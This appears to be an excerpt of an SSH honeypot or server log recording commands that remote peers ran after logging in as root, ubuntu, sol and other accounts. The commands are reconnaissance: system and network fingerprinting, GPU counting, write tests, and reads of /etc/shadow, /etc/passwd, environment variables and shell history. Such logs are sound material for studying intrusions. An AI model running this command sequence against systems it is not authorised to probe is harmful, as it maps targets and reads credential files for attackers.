line=63553 conn=8447 peer=103.192.199.168 user=root cmd=netstat -tulpn | head -10
line=63560 conn=8447 peer=103.192.199.168 user=root cmd=ssh -V
line=63567 conn=8447 peer=103.192.199.168 user=root cmd=uptime
line=63582 conn=8447 peer=103.192.199.168 user=root cmd=mount | head -5
line=63589 conn=8447 peer=103.192.199.168 user=root cmd=env | head -10
line=63596 conn=8447 peer=103.192.199.168 user=root cmd=pwd
line=63603 conn=8447 peer=103.192.199.168 user=root cmd=ls -la /
line=63616 conn=8447 peer=103.192.199.168 user=root cmd=history | tail -5
line=63625 conn=8447 peer=103.192.199.168 user=root cmd=netstat -tulpn 2>/dev/null | grep LISTEN | head -20
line=63632 conn=8447 peer=103.192.199.168 user=root cmd=ls -la /etc/network/interfaces /etc/sysconfig/network-scripts/ /etc/netplan/ 2>/dev/null | head -5
line=63639 conn=8447 peer=103.192.199.168 user=root cmd=ip addr show 2>/dev/null | grep -E '^[0-9]+:' | head -5
line=63646 conn=8447 peer=103.192.199.168 user=root cmd=ip route show 2>/dev/null | head -3
line=63653 conn=8447 peer=103.192.199.168 user=root cmd=echo 'test' > /tmp/test_1776904642
line=63665 conn=8447 peer=103.192.199.168 user=root cmd=rm -f /tmp/test_1776904642
line=63672 conn=8447 peer=103.192.199.168 user=root cmd=cat /etc/passwd 2>/dev/null | head -1
line=63679 conn=8447 peer=103.192.199.168 user=root cmd=cat /etc/shadow 2>/dev/null | head -1
line=63686 conn=8447 peer=103.192.199.168 user=root cmd=cat /proc/version 2>/dev/null | head -1
line=63693 conn=8447 peer=103.192.199.168 user=root cmd=id
line=63700 conn=8447 peer=103.192.199.168 user=root cmd=whoami
line=63707 conn=8447 peer=103.192.199.168 user=root cmd=pwd
line=63714 conn=8447 peer=103.192.199.168 user=root cmd=cat /proc/cpuinfo | grep 'model name' | head -1
line=63721 conn=8447 peer=103.192.199.168 user=root cmd=uname -r
line=63728 conn=8447 peer=103.192.199.168 user=root cmd=which apt
line=63735 conn=8447 peer=103.192.199.168 user=root cmd=which yum
line=63742 conn=8447 peer=103.192.199.168 user=root cmd=which pacman
line=63749 conn=8447 peer=103.192.199.168 user=root cmd=which zypper
line=63756 conn=8447 peer=103.192.199.168 user=root cmd=systemctl list-units --type=service --state=running 2>/dev/null | head -10
line=63763 conn=8447 peer=103.192.199.168 user=root cmd=ping -c 1 8.8.8.8 2>/dev/null | grep '1 packets transmitted'
line=63770 conn=8447 peer=103.192.199.168 user=root cmd=time dd if=/dev/zero of=/tmp/test bs=1M count=10 2>&1
line=63777 conn=8447 peer=103.192.199.168 user=root cmd=rm -f /tmp/test
line=63784 conn=8447 peer=103.192.199.168 user=root cmd=ss -tuln 2>/dev/null | wc -l
line=63828 conn=8454 peer=5.75.200.1 user=root cmd=unset LANG LANGUAGE LC_CTYPE LC_COLLATE LC_MONETARY LC_NUMERIC LC_TIME LC_MESSAGES LC_ALL HUMAN_BLOCKS LS_COLORS;cd '.';cd '.';cd '.';pwd;ls -la
line=63829 conn=8454 peer=5.75.200.1 user=root cmd=while true; do sleep 1;head -v -n 8 /proc/meminfo; head -v -n 2 /proc/stat /proc/version /proc/uptime /proc/loadavg /proc/sys/fs/file-nr /proc/sys/kernel/hostname; tail -v -n 32 /proc/net/dev;echo '==> /proc/df <==';df -l;echo '==> /proc/who <==';who;echo '==> /proc/end <==';echo '##Moba##'; done
line=64937 conn=8609 peer=80.94.92.182 user=ubuntu cmd=/bin/./uname -s -v -n -r -m
line=64944 conn=8609 peer=80.94.92.182 user=ubuntu cmd=uptime -p
line=64951 conn=8609 peer=80.94.92.182 user=ubuntu cmd=lspci | grep VGA | cut -f5- -d ' '
line=64958 conn=8609 peer=80.94.92.182 user=ubuntu cmd=lspci | grep VGA -c
line=64965 conn=8609 peer=80.94.92.182 user=ubuntu cmd=nvidia-smi -q | grep "Product Name" | head -n 1 | awk '{print $4, $5, $6, $7, $8, $9, $10, $11}'
line=64972 conn=8609 peer=80.94.92.182 user=ubuntu cmd=lspci | grep "3D controller" | cut -f5- -d ' '
line=64979 conn=8609 peer=80.94.92.182 user=ubuntu cmd=nvidia-smi -q | grep "Product Name" | awk '{print $4, $5, $6, $7, $8, $9, $10, $11}' | grep . -c 
line=65613 conn=8693 peer=2.57.122.238 user=sol cmd=/bin/./uname -s -v -n -r -m
line=65620 conn=8693 peer=2.57.122.238 user=sol cmd=uptime -p
line=65627 conn=8693 peer=2.57.122.238 user=sol cmd=lspci | grep VGA | cut -f5- -d ' '
line=65634 conn=8693 peer=2.57.122.238 user=sol cmd=lspci | grep VGA -c
line=65641 conn=8693 peer=2.57.122.238 user=sol cmd=nvidia-smi -q | grep "Product Name" | head -n 1 | awk '{print $4, $5, $6, $7, $8, $9, $10, $11}'
line=65648 conn=8693 peer=2.57.122.238 user=sol cmd=lspci | grep "3D controller" | cut -f5- -d ' '
line=65655 conn=8693 peer=2.57.122.238 user=sol cmd=nvidia-smi -q | grep "Product Name" | awk '{print $4, $5, $6, $7, $8, $9, $10, $11}' | grep . -c 
line=67958 conn=8996 peer=87.121.84.41 user=node cmd=uname -s -v -n -r -m
line=68498 conn=9070 peer=176.65.132.254 user=gitlab cmd=uname -s -v -n -r -m